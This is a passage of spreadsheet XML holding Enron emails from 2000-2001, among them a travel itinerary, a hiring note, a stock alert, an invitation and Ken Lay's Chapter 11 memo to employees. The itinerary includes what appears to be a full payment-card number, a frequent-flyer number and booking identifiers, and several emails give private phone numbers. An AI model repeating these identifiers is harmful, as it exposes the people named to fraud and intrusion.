Jan Moore_x000D_
713-345-3858_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 16:34:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tfolse@lsu.edu'})</t>
  </si>
  <si>
    <t>frozenset({'klay@enron.com', 'ken_lay@enron.com', 'kenlay@enron.com', 'k_lay@enron.com'})</t>
  </si>
  <si>
    <t>how are things?</t>
  </si>
  <si>
    <t>Why?_x000D_
I lost my school money b/c of the price of enron stock._x000D_
$10,000 is now gone....How did you fare?_x000D_
Trent</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 00:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lwitt@netbotz.com'})</t>
  </si>
  <si>
    <t>Re: RE quote eCompany</t>
  </si>
  <si>
    <t xml:space="preserve">Greg Piper would be your contact.  You can reach Greg at 713-853-6161._x000D_
_x000D_
Thanks,_x000D_
Joannie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Lynne Witt" &lt;lwitt@netbotz.com&gt; on 03/18/2001 03:29:39 PM_x000D_
To: &lt;jeff.skilling@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE quote eCompany_x000D_
_x000D_
_x000D_
Mr. Skilling,_x000D_
_x000D_
I was compelled to contact you by the following information:_x000D_
While reading eCompany Magazine March Issue, I came across the following_x000D_
quote from Jeff Skilling CEO of Enron._x000D_
_x000D_
"Keeping the system up. You dread the chance the system will crash. We had_x000D_
an air conditioning problem last April or May, and went down._x000D_
The next day the front page of Gas Daily Journal had a story that said "Gas_x000D_
trading stops because Enron online is down.""_x000D_
_x000D_
Netbotz offers early warning to just that type of failure and more._x000D_
http://www.netbotz.com_x000D_
_x000D_
Mr. Skilling who would I contact at Enron to make them aware of a product_x000D_
with a sub $1000. price tag to prevent those issues in the future?_x000D_
_x000D_
Lynne Witt_x000D_
Inside Sales Manager_x000D_
NetBotz, Inc._x000D_
Phone 512-439-5825_x000D_
Fax 512-439-5801_x000D_
www.netbotz.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 07:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>MANN 17OCT HOU TO NYC</t>
  </si>
  <si>
    <t xml:space="preserve">Latest.  I think it just changes my seat assignment._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/16/2000 02:06 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Claudette Harvey@ECT_x000D_
10/16/2000 02:05 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Suzanne Adams/HOU/ECT@ECT _x000D_
_x000D_
Subject: MANN 17OCT HOU TO NYC_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Claudette Harvey/HOU/ECT on 10/16/2000 _x000D_
02:04 PM ---------------------------_x000D_
_x000D_
_x000D_
Julie Hunt &lt;jhunt_vitoltvl@yahoo.com&gt; on 10/16/2000 01:58:59 PM_x000D_
To: CHARVEY2@ENRON.COM_x000D_
cc:  _x000D_
Subject: MANN 17OCT HOU TO NYC_x000D_
_x000D_
_x000D_
                                                   SALES AGT: JH/YDLPA5_x000D_
_x000D_
                                          MANN/C KAY_x000D_
_x000D_
_x000D_
  ENRON_x000D_
  1400 SMITH_x000D_
  HOUSTON TX 77002_x000D_
  ATTN: C HARVEY X30497_x000D_
_x000D_
_x000D_
  DATE:  OCT 16 2000                   ENRON_x000D_
_x000D_
SERVICE               DATE  FROM           TO             DEPART_x000D_
ARRIVE_x000D_
_x000D_
CONTINENTAL AIRLINES  17OCT HOUSTON TX     NEW YORK NY    937A    215P_x000D_
CO 1966    Y          TUE   G.BUSH INTERCO LA GUARDIA_x000D_
                            TERMINAL C     TERMINAL M_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         3:38 DURATION_x000D_
                  AIRCRAFT: BOEING 737-300_x000D_
                            SEAT UPGRADED 1E_x000D_
_x000D_
HOTEL                 17OCT THE MARK NEW YORK_x000D_
                      19OCT 25 EAST 77TH STREET_x000D_
                            NEW YORK, NY 10021_x000D_
                            UNITED STATES OF AMERICA_x000D_
                            TELEPHONE: ++1 212 7444 300_x000D_
                            FAX: ++1 212 4725 714_x000D_
                            CONFIRMATION: 199329_x000D_
                            SINGLE ROOM KING SIZE BED_x000D_
                            RATE: COR USD 500.00 PER NIGHT_x000D_
                            ONLY JR SUITE AVAILABLE_x000D_
                4PM 24HR CANCELLATION POLICY AT THE MARK_x000D_
_x000D_
CONTINENTAL AIRLINES  19OCT NEW YORK NY    HOUSTON TX     1050A   136P_x000D_
CO 1249    Y          THU   LA GUARDIA     G.BUSH INTERCO_x000D_
                            TERMINAL M     TERMINAL C_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         3:46 DURATION_x000D_
                  AIRCRAFT: BOEING 737-700_x000D_
                            SEAT UPGRADED 1B_x000D_
_x000D_
      AIR FARE 1795.34      TAX 142.66          TOTAL USD_x000D_
1938.00_x000D_
                                            AIR TOTAL USD_x000D_
1938.00_x000D_
_x000D_
                                        INVOICE TOTAL USD_x000D_
1938.00_x000D_
_x000D_
PAYMENT: CCAX372809836632012/1001/A000030_x000D_
_x000D_
RESERVATION NUMBER(S)  CO/M9D4NH_x000D_
_x000D_
MANN/C KAY                               TICKET:CO/ETKT 005 7016787231_x000D_
_x000D_
CO  FREQUENT FLYER COHG770475_x000D_
**CONTINENTAL RECORD LOCATOR: M9D4NH_x000D_
***********************************************_x000D_
THIS IS A TICKETLESS RESERVATION. PLEASE HAVE A_x000D_
PICTURE ID AVAILABLE AT THE AIRPORT. THANK YOU_x000D_
                  THANK YOU FOR CALLING VITOL TRAVEL_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Messenger - Talk while you surf!  It's FREE._x000D_
http://im.yahoo.com/_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 00:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mark H. Slaughter information</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by John J Lavorato/Corp/Enron on 08/03/2000 _x000D_
07:30 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris Williams @ ECT                           08/01/2000 01:13 PM_x000D_
	_x000D_
_x000D_
To: John J Lavorato/Corp/Enron@Enron_x000D_
cc: Kim Melodick/HOU/ECT@ECT _x000D_
_x000D_
Subject: Mark H. Slaughter information_x000D_
_x000D_
John,_x000D_
  In an attempt to keep you informed, Gary Hickerson is bringing in a _x000D_
gentleman by the name of Mark Slaughter to work on his desk in an _x000D_
Agribusiness Consultant role.  Mark will be on contract for a 6 month period _x000D_
and may be brought on full time pending his success.  His rate of pay is _x000D_
equivalent to $80k annually.  If  Enron breaks the contract within three _x000D_
months Mark will be paid a breakage fee of 20k.  If contract is broken after _x000D_
three months Mark will be paid the amount remaining under his agreement.   If _x000D_
Mark is hired full time during this contract there will be no associated fee _x000D_
involved. _x000D_
Feel free to contact me if there are any questions_x000D_
_x000D_
Chris Williams_x000D_
ENA Staffing_x000D_
x39866_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 06:54:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'morning26@alerts.equityalert.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09[IMAGE]=09 =09[IMAGE]=09[IMAGE]=09_x000D_
_x000D_
_x000D_
             [IMAGE] [IMAGE]   [IMAGE] [IMAGE] Upgrades  [IMAGE] DownGrades=_x000D_
  [IMAGE] Coverage Initiated  [IMAGE] Stock Splits  [IMAGE] Buybacks  [IMAG=_x000D_
E] Pos Pre-Announce  [IMAGE] Neg Pre-Announce     [IMAGE]   [IMAGE]   [IMAG=_x000D_
E]  [IMAGE]  [IMAGE] Unsubscribe  [IMAGE] Update my Membership / Profile  [=_x000D_
IMAGE] Forgot Username / Password  [IMAGE] Add / Edit Alerts  [IMAGE] View =_x000D_
My Alerts   [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE]  [IMAGE]    [IMAGE] [=_x000D_
IMAGE] [IMAGE] =09  As requested, your News Alert for YHOO  follows from Eq=_x000D_
uityAlert.com.     Multimedia Available: SpotLife Announces Agreement with =_x000D_
Yahoo! Mail   Nov 26, 2001 (BUSINESS WIRE) -- SpotLife, the leading provide=_x000D_
r of integrated personal video solutions, and Yahoo! Inc. (Nasdaq:YHOO), a =_x000D_
leading global communications, commerce and media company, on November 26 a=_x000D_
nnounced an agreement to offer users video e-mail services through Yahoo!(R=_x000D_
) Mail.   The addition of video e-mail services will enable users of Yahoo!=_x000D_
 Mail to easily create and send personalized video e-mail messages to frien=_x000D_
ds, family and colleagues virtually anywhere in the world.   You can reach =_x000D_
the story directly by going to http://www.newstream.com/cgi-bin/display_sto=_x000D_
ry.cgi?4467.   This multimedia news story is for free and unrestricted use =_x000D_
on your news information site (and for print or broadcast too). Visit http:=_x000D_
//www.newstream.com to download video, audio, text, graphics and photos.   =_x000D_
If you have any questions about the story, or about Newstream.com, please w=_x000D_
rite to us at info@newstream.com.   CONTACT:          Newstream            =_x000D_
       info@newstream.com URL:              http://www.businesswire.com Tod=_x000D_
ay's News On The Net - Business Wire's full file on the Internet with Hyper=_x000D_
links to your home page.  Copyright (C) 2001 Business Wire.  All rights res=_x000D_
erved.  -0-   KEYWORD:          CALIFORNIA NEW YORK INDUSTRY KEYWORD: COMPU=_x000D_
TERS/ELECTRONICS                   CONSUMER/HOUSEHOLD                   INT=_x000D_
ERNET                   SOFTWARE                   ADVISORY                =_x000D_
   SOURCE:                   Newstream    [IMAGE]    ***IMPORTANT NOTICE AN=_x000D_
D DISCLAIMER REGARDING THIS COURTESY EMAIL***  At your request, as a subscr=_x000D_
iber to our service, this email alert is being sent to you as a courtesy an=_x000D_
d is for information purposes only. We are a financial news re-distributor.=_x000D_
 We are not an investment advisory and do not purport to tell or suggest wh=_x000D_
ich companies you should monitor or which securities you should purchase or=_x000D_
 sell.   In addition, not withstanding our policy of prohibiting employees =_x000D_
from buying or selling securities of an advertising company for a period of=_x000D_
 20 days following dissemination of the advertisement, we may not be able t=_x000D_
o effectively monitor our employees to ensure compliance with the same. Con=_x000D_
sequently, there may be sales and/or purchases of such securities by our em=_x000D_
ployees prior to, during and immediately following the dissemination of the=_x000D_
 advertisement.   Please note that (1) this email may not contain the full =_x000D_
text of the press release issued by, or the research or other reports regar=_x000D_
ding, the Monitored Company; and (2) the text of the advertisement, the pre=_x000D_
ss release and/or reports were obtained from third party sources and were n=_x000D_
ot written, generated or edited by us; accordingly, we make no representati=_x000D_
ons or give any assurance as to the accuracy or completeness, nor have we c=_x000D_
onducted any independent investigations of, the disclosures regarding the s=_x000D_
ubject matter of such releases and reports.   Please note that links to the=_x000D_
 advertising company and/or Monitored Company are provided for your conveni=_x000D_
ence. We assume no obligation for the content of such sites.   All informat=_x000D_
ion contained herein should be independently verified by you with the adver=_x000D_
tising company or with Monitored Company or any other sources you prefer.  =_x000D_
 [THIS IS ONLY A SUMMARY OF, AND IS QUALIFIED IN ITS ENTIRETY BY REFERENCE =_x000D_
TO, THE "EQUITYALERT SUBSCRIBER AGREEMENT AND DISCLAIMER." PLEASE VISIT htt=_x000D_
p://www.equityalert.com/home/disclaim.asp  FOR ACCESS TO OUR COMPLETE DISCL=_x000D_
AIMER]        =09  [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE] [IMAGE] [IMAGE=_x000D_
]  [IMAGE] [IMAGE] [IMAGE] Stock  Quote [IMAGE]   [IMAGE] Stock  Chart [IMA=_x000D_
GE]   [IMAGE] Covered  Calls  [IMAGE]   [IMAGE] Company  Profile [IMAGE]   =_x000D_
[IMAGE] [IMAGE]  [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE] =_x000D_
[IMAGE] [IMAGE] Option  Details  [IMAGE]   [IMAGE] Black  - Scholes [IMAGE]=_x000D_
     [IMAGE]  Power Option PLUS Logo    [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IM=_x000D_
AGE] [IMAGE]   =09_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 16:10:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bert.meyers@enron.com'})</t>
  </si>
  <si>
    <t>RE: Balloon Fiesta Invitation from Dave Miller at PNM</t>
  </si>
  <si>
    <t xml:space="preserve">Bert,_x000D_
I put all the names in a hat...and you are the man...please revise the schedule and redistribute it with yourself attending the trip..._x000D_
Enjoy!_x000D_
_x000D_
-----Original Message-----_x000D_
From: Meyers, Bert _x000D_
Sent: Saturday, September 29, 2001 8:18 AM_x000D_
To: Williams III, Bill_x000D_
Subject: FW: Balloon Fiesta Invitation from Dave Miller at PNM_x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Stephens, Sandy [mailto:SSTEPHE@pnm.com]_x000D_
Sent: Friday, September 28, 2001 12:33 PM_x000D_
To: Meyers, Bert_x000D_
Subject: Balloon Fiesta Invitation from Dave Miller at PNM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;&lt;...OLE_Obj...&gt;&gt; The Wholesale Power Marketing Group Invites You To Be Our Guest For The  2001 Fall Energy Fiesta! _x000D_
_x000D_
The Wholesale Power Marketing Group cordially extends this invitation to join us Wednesday evening, October 10th through noon Friday, October 12th as a guest at our annual 2001 Fall Energy Fiesta!   This is an occasion to meet all the members of our team, tour our trading floor, explore possible business opportunities and of course, enjoy Albuquerque's historic International Balloon Fiesta!   As our guest, we will provide, at no expense to you, the following:_x000D_
_x000D_
        _x000D_
_x000D_
&lt;&lt;...OLE_Obj...&gt;&gt; _x000D_
          _x000D_
          -  Tickets to the Balloon Fiesta _x000D_
_x000D_
-  Balloon rides (weather permitting) _x000D_
- Ground transportation to and from the airport and throughout your stay _x000D_
-       Shared lodging in a Class A Recreational Vehicle on-site at the Fiesta _x000D_
-       Meals  _x000D_
-       Day sight-seeing and shopping trips to Santa Fe or complimentary golf _x000D_
-       Fiesta memorabilia _x000D_
_x000D_
You will be responsible for your travel to and from Albuquerque. _x000D_
I have attached an RSVP form for you to fill out with certain information that is needed prior to your arrival.  Please fill it out and wither email it to me at sstephe@pnm.com &lt; &lt;mailto:sstephe@pnm.com&gt;&gt; or fax it to me at 505/855-6240._x000D_
_x000D_
Thanks. _x000D_
_x000D_
&lt;&lt;RSVP Form.doc&gt;&gt; _x000D_
_x000D_
And........If you decide to go, _x000D_
_x000D_
1.  Please email me, call me or fill out the attached form and fax it back to me with your travel information as soon as you know it, so we can arrange times to meet you at the airport. _x000D_
_x000D_
2.  In October, Albuquerque can be very cool.  Please bring a light jacket and/or sweater, and some warm clothes, as many of the events we will be hosting are outside._x000D_
_x000D_
3.  You will be lodging in a Class a RV on site at the Balloon Fiesta, with one of our other guests.  There will be 3 RV's that we have secured for our guests (6 guests in all), and these RV's will be parked in our own reserved area of the Balloon Fiesta.  This way, there will be no "early rising" to attend balloon events, as some of the start times for ascension events are 5:45AM - 7:00 AM!  And you will be in midst of all of the excitement.  These RV's are top of the line: roomy, comfortable, and well-stocked with all the necessities (snacks, drinks, toiletries, sheets, blankets, towels)._x000D_
_x000D_
4.  All meals will be hosted by us, either at local restaurants or they will be professionally catered to our area. _x000D_
_x000D_
We will also host an outing to Santa Fe; sightseeing and museums, or you can play golf instead (please indicate in your reply if you will be renting clubs or bringing your own).    We would also like to treat you to a balloon ride (weather permitting) if you are so inclined.  Just please note it on the attached sheet._x000D_
_x000D_
And last but not least, we would like you to provide us with your sweatshirt size so we can send you home with an official Balloon Fiesta sweatshirt._x000D_
_x000D_
I have enclosed a schedule of events for you to know what will be happening here at the Balloon Fiesta while you are here._x000D_
_x000D_
&lt;&lt;wave 2 schedule of events.doc&gt;&gt; _x000D_
_x000D_
All of us at PNM's Wholesale Power Marketing are thrilled that you are coming!  If you have any questions, please feel free to call me._x000D_
_x000D_
Regards, _x000D_
_x000D_
_x000D_
Sandy Stephens _x000D_
Assistant to Duane Farmer _x000D_
505/855-6202 direct line _x000D_
505/855-6240 fax _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 10:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: INFORMS National conference at San Antonio</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 09/29/2000 _x000D_
05:32 PM ---------------------------_x000D_
_x000D_
_x000D_
Shijie Deng &lt;deng@isye.gatech.edu&gt; on 09/28/2000 09:58:22 AM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc:  _x000D_
Subject: Re: INFORMS National conference at San Antonio_x000D_
_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
I'm really glad to know that you could make it.  Could you send me a_x000D_
title, 50-word abstract and author info. (title and contact info.) by the_x000D_
end of this week?  Thanks!_x000D_
_x000D_
Shijie_x000D_
_x000D_
_x000D_
On Thu, 28 Sep 2000 Vince.J.Kaminski@enron.com wrote:_x000D_
_x000D_
&gt;_x000D_
&gt; Shijie,_x000D_
&gt;_x000D_
&gt; I would be interested in attending and giving a presentation._x000D_
&gt;_x000D_
&gt; This would be also a good opportunity for both of us to meet_x000D_
&gt; and discuss the plans for closer cooperation._x000D_
&gt;_x000D_
&gt; Vince_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Shijie Deng &lt;deng@isye.gatech.edu&gt; on 09/25/2000 01:20:59 AM_x000D_
&gt;_x000D_
&gt; To:   Vince Kaminski &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
&gt; cc:   Shijie Deng &lt;deng@isye.gatech.edu&gt;_x000D_
&gt; Subject:  INFORMS National conference at San Antonio_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hi Vince,_x000D_
&gt;_x000D_
&gt; I'll be organizing a session at the INFORMS national meeting in San_x000D_
&gt; Antonio (Nov 5-8, 2000, http://www.informs.org/Conf/SanAntonio2000) on_x000D_
&gt; modeling price volatility in electricity markets or financial engineering_x000D_
&gt; approaches.  I'm just wondering if you or some member of your research_x000D_
&gt; group would be interested in giving a presentation there.  Please let me_x000D_
&gt; know.  Thanks._x000D_
&gt;_x000D_
&gt; Best wishes,_x000D_
&gt;_x000D_
&gt; Shijie_x000D_
&gt;_x000D_
&gt; Shi-Jie Deng_x000D_
&gt; Assistant Professor_x000D_
&gt; School of ISyE_x000D_
&gt; Georgia Institute of Technology_x000D_
&gt;_x000D_
&gt; Office Phone: (404) 894-6519_x000D_
&gt; E-mail:       deng@isye.gatech.edu_x000D_
&gt; Home page:    http://www.isye.gatech.edu/~deng_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 2 Dec 2001 15:45:26 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Files Chapter 11 Reorganization</t>
  </si>
  <si>
    <t>To All Employees:_x000D_
_x000D_
This morning Enron took a series of actions designed to stabilize our situation and preserve the value in our businesses:_x000D_
_x000D_
-- We filed voluntary petitions for relief under Chapter 11 of the U.S. Bankruptcy Code. Contrary to popular belief, this does not mean we are out of business. What it does mean is that we have entered into a court-supervised process by which we can continue to operate most of our businesses, reorganize our finances, and explore various strategic, operational and financial alternatives, including the sale of non-core assets, in an orderly manner._x000D_
_x000D_
_x000D_
-- In connection with our filing for Chapter 11 reorganization, Enron is in active discussions with leading financial institutions for debtor-in-possession (DIP) financing and expects to complete these discussions shortly. Upon the completion and court approval of these arrangements, the new funding will be available immediately on an interim basis to supplement Enron's existing capital and help the Company fulfill obligations associated with operating its business, including its employee payroll and payments to vendors for goods and services provided on or after today's filing._x000D_
_x000D_
-- We filed a lawsuit against Dynegy, alleging breach of contract and other causes of action for Dynegy's wrongful termination of our proposed merger. We are asking the court for damages of not less than $10 billion._x000D_
_x000D_
-- We also announced this morning that we are in active discussions with various leading financial institutions about providing financial support to recapitalize and revitalize the company's wholesale energy trading operations under a new ownership structure. As contemplated, this recapitalized entity will be staffed with people from Enron's current wholesale energy trading team, and will conduct counterparty transactions through EnronOnline._x000D_
_x000D_
These are the first steps in a strategic restructuring process that will allow Enron to meet its obligations to its creditors and preserve the value in our core wholesale energy trading business. From an operational standpoint, our energy businesses - including our pipelines, utilities and other energy assets - are conducting safe and normal operations around the world, and will continue to do so._x000D_
_x000D_
As you know, the second and unavoidable part of our restructuring is to improve our financial position by implementing a comprehensive cost-savings program. This will entail a significant reduction in our work force. This is painful for all of us and our goal is for as many of you as is possible to know where you stand by the end of the day Tuesday, though in some cases notification will take longer._x000D_
_x000D_
For our friends and colleagues who will lose their jobs as part of this process, you will remain on the company payroll for now. In addition, we will submit a severance pay plan to the Bankruptcy Court for approval. This approval must be received before we can begin paying severance benefits. We will be providing more information about this plan as soon as the Court has made its determination._x000D_
_x000D_
I know these actions raise new questions about our company's future and what this means for each of us. Your business unit leader will be holding floor meetings on Monday to discuss these events with you. In addition, you can access a copy of the press release on  &lt;http://home.enron.com/&gt;. We will also have a Q&amp;A and other materials for you on Monday. While there is a great deal we simply don't know yet, we hope these materials will help answer at least some of your questions._x000D_
_x000D_
When decisions are made affecting our company, people, and operations, we will let you know as quickly as possible. There is still considerable value and opportunity in our business. The strategic restructuring process that we are beginning will allow us to preserve that value and those opportunities._x000D_
_x000D_
On behalf of the Board and entire management team, we greatly appreciate your patience, your professionalism and whatever support you can offer each other as we navigate through these tough times to a better future._x000D_
_x000D_
Ken</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 06:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'birdsey@haas.berkeley.edu', 'undergrd@haas.berkeley.edu', 'mba02@haas.berkeley.edu', 'eveningmba@haas.berkeley.edu', 'mba01@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Alpine Discount Ski Tickets!!!!! Deadline Extended!!</t>
  </si>
  <si>
    <t xml:space="preserve">YOU CAN STILL BUY ALPINE DISCOUNT SKI TICKETS!!!_x000D_
_x000D_
Tell your friends and family!? The more we get the better!_x000D_
_x000D_
PUT YOUR CHECK IN MY MBA02 MAILBOX BY THIS FRIDAY(11/3).? _x000D_
$42 each - good all year, and transferrable!_x000D_
_x000D_
Any questions please see below, or ask me._x000D_
_x000D_
Thanks,_x000D_
Matt_x000D_
_x000D_
_x000D_
Redwoods@Haas is organizing discounted ski tickets at Squaw Valley and Alpine _x000D_
Meadows.? _x000D_
_x000D_
This is a great way to save some money if you plan on skiing this year.? _x000D_
Both Squaw and Alpine are PREMIERE North Lake Tahoe ski resorts._x000D_
_x000D_
Squaw Valley Tickets cost $45 each and include night skiing. (Regular Price _x000D_
$54)_x000D_
Make checks payable to Will Birdsey and leave them in my MBA02 mailbox.? _x000D_
Deadline Friday, October 27th!_x000D_
_x000D_
Alpine Meadows Tickets cost $42 each.? (Regular Price $52)_x000D_
Make checks payable to Matt Hawe and leave them in his MBA02 mailbox.? _x000D_
Deadline Friday, October 27th!  _x000D_
_x000D_
Tickets are good all ski season (including holidays and weekends)  _x000D_
Tickets are transferrable  _x000D_
Buy as many (or as few) tickets as you want  _x000D_
_x000D_
See you on the slopes!_x000D_
Matthew Hawe_x000D_
Haas MBA Candidate '02 </t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 08:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>A schedule that has to go real time for 1/5</t>
  </si>
  <si>
    <t xml:space="preserve">BPA C#23851-BPA(T)SYS/SYS O#95363 HNF-BPA-EPMI-PACW_x000D_
_x000D_
This schedule was originally supposed to go on Pacw transmission, but late in _x000D_
the day they said they never agreed to that and would not do it._x000D_
_x000D_
Shawna at BPA agreed to use their transmission on a real time basis for _x000D_
Friday only.  _x000D_
_x000D_
Please call this schedule in to the appropriate real time departments._x000D_
_x000D_
C_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 07:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.taylor@enron.com', 'carol.clair@enron.com'})</t>
  </si>
  <si>
    <t>Part Time Benefits</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 12/20/2000 03:48 PM -----_x000D_
_x000D_
	Sheila Walton_x000D_
	12/20/2000 02:35 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Part Time Benefits_x000D_
_x000D_
Here is the sheet for reduced hours employees._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 10:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'terri.clynes@enron.com'})</t>
  </si>
  <si>
    <t>Re: 2 Draft Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Terri --  As discussed, attached please find the two confirmation agreements _x000D_
with my comments.  Please modify to reflect your own review and come back to _x000D_
me with any questions or comments.  --David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Terri Clynes_x000D_
	12/06/2000 07:04 PM_x000D_
		 _x000D_
		 To: David Portz/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: 2 Draft Contracts_x000D_
_x000D_
David,_x000D_
_x000D_
Please review these agreements and let me know your comments.  I am in Las _x000D_
Vegas this week but am available to discuss._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Terri_x000D_
---------------------- Forwarded by Terri Clynes/HOU/ECT on 12/06/2000 06:56 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Pam Sarvela (MPEX)" &lt;psarvela@mnpower.com&gt; on 12/06/2000 11:41:47 AM_x000D_
To: "'Terri.Clynes@enron.com'" &lt;Terri.Clynes@enron.com&gt;_x000D_
cc:  _x000D_
Subject: 2 Draft Contracts_x000D_
_x000D_
_x000D_
 &lt;&lt;ScheduleK2001..doc&gt;&gt;  &lt;&lt;EnronLD_K2001.doc&gt;&gt;_x000D_
_x000D_
Terri;_x000D_
_x000D_
Attached are two draft contracts._x000D_
_x000D_
The first contract is for the Schedule K - Participation Power Purchase,_x000D_
with a fixed price block of energy for $64 MWh, and capacity at $4,666.67_x000D_
MW-Month (or $28-Kw season).  The repricing provisions are based off of a_x000D_
loss of system resources of greater than 150 MW, with the units identified._x000D_
_x000D_
The second contract is for the Financially Firm Energy.  I structured this a_x000D_
little differently than what I originally anticipated, based on a discussion_x000D_
with Tim and how the ASC views "financially firm" accredited products._x000D_
Since EPRI wants to be able to accredit this transaction, the best way to_x000D_
deal with the financial firm energy seemed to be by pulling it out and_x000D_
putting it into an exhibit.  I'm open to discussion on this if EPMI has a_x000D_
alternative way that they would like to see.  Also, please note that per our_x000D_
discussion on Friday, December 1, I added a contingency into this document_x000D_
that Split Rock and EPMI must enter into a Master Agreement by December 15_x000D_
or the agreement will be void._x000D_
_x000D_
_x000D_
_x000D_
 - ScheduleK2001..doc_x000D_
 - EnronLD_K2001.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 02:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Draft May 9 Project Why Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">here'[s the second installment.  Thanks DF_x000D_
_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 05/08/2000 _x000D_
09:33 AM ---------------------------_x000D_
_x000D_
_x000D_
Shelley Corman_x000D_
05/05/2000 04:17 PM_x000D_
To: Mary Kay Miller/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Jack _x000D_
Boatman/FGT/Enron@ENRON, Rachel Cady/FGT/Enron@ENRON, Dave _x000D_
Neubauer/ET&amp;S/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Draft May 9 Project Why Presentation_x000D_
_x000D_
FYI.  Attached is a copy of the Project Why status presentation that will be _x000D_
made next week at Stan's May 9 staff meeting.  The purpose of the _x000D_
presentation was to present a list of brainstorming ideas from an Apr. 16 _x000D_
offsite session to GPG management &amp; get some preliminary feedback on the _x000D_
kinds of ideas they would like to see proceed.  It was never meant to be a _x000D_
definitive plan for implementing those ideas.  I always envisioned the _x000D_
individual commercial groups picking up on which ideas they liked and wanted _x000D_
to implement &amp; developing their own detailed plans for implementing.  _x000D_
---------------------- Forwarded by Shelley Corman/ET&amp;S/Enron on 05/05/2000 _x000D_
04:10 PM ---------------------------_x000D_
_x000D_
_x000D_
Shelley Corman_x000D_
05/05/2000 04:10 PM_x000D_
To: Scott Coburn/NPNG/Enron@ENRON, Julia White/ET&amp;S/Enron@ENRON, Steve _x000D_
Hotte/Corp/Enron@ENRON, Steven January/ET&amp;S/Enron@ENRON, Lynn _x000D_
Blair/ET&amp;S/Enron@ENRON, Sheila Nacey/ET&amp;S/Enron@ENRON, Bob M _x000D_
Hall/FGT/Enron@ENRON, Donna Scott/FGT/Enron@ENRON, Dana _x000D_
Jones/ET&amp;S/Enron@ENRON, Rick Dietz/ET&amp;S/Enron@ENRON, Tina _x000D_
Dunnaway/FGT/Enron@ENRON, Richard Shepherd/NPNG/Enron@ENRON, Dan _x000D_
Fancler/ET&amp;S/Enron@ENRON, Steve Gilbert/ET&amp;S/Enron@ENRON, John _x000D_
